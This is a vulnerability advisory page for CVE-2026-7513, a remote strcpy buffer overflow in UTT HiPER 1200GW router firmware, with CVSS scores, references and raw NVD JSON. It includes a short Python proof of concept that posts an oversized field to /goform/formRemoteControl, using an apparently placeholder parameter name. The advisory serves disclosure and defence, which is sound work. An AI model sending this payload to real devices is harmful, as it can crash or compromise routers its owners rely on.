CVE-2026-7513

Description

A vulnerability has been found in UTT HiPER 1200GW up to 2.5.3-170306. The impacted element is the function strcpy of the file /goform/formRemoteControl. The manipulation leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UTT HiPER 1200GW <= 2.5.3-170306

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_poc(target_ip):
    """
    PoC for CVE-2026-7513 Buffer Overflow in UTT HiPER 1200GW
    Target: /goform/formRemoteControl
    """
    url = f"http://{target_ip}/goform/formRemoteControl"
    # Payload with excessive length to trigger strcpy overflow
    payload = b"A" * 2000 
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "PoC-Client/1.0"
    }
    
    try:
        # Sending the malicious payload
        response = requests.post(url, data={"vuln_param": payload}, headers=headers, timeout=5)
        print(f"[+] Payload sent to {target_ip}")
        print(f"[+] Response Status: {response.status_code}")
        if response.status_code == 200 or response.status_code == 500:
            print("[+] Potential crash triggered, check device availability.")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection failed or target crashed: {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with actual target IP
    exploit_poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7513
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7513
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7513/
[4] VulDB https://vuldb.com/cve/CVE-2026-7513
[5] https://github.com/kirlic123/IOTvulner/blob/main/4035/4/4.md
[6] https://vuldb.com/submit/803996
[7] https://vuldb.com/vuln/360324
[8] https://vuldb.com/vuln/360324/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7513", "sourceIdentifier": "[email protected]", "published": "2026-05-01T00:16:25.443", "lastModified": "2026-05-01T15:26:24.553", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in UTT HiPER 1200GW up to 2.5.3-170306. The impacted element is the function strcpy of the file /goform/formRemoteControl. The manipulation leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://github.com/kirlic123/IOTvulner/blob/main/4035/4/4.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/803996", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360324", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/360324/cti", "source": "[email protected]"}]}}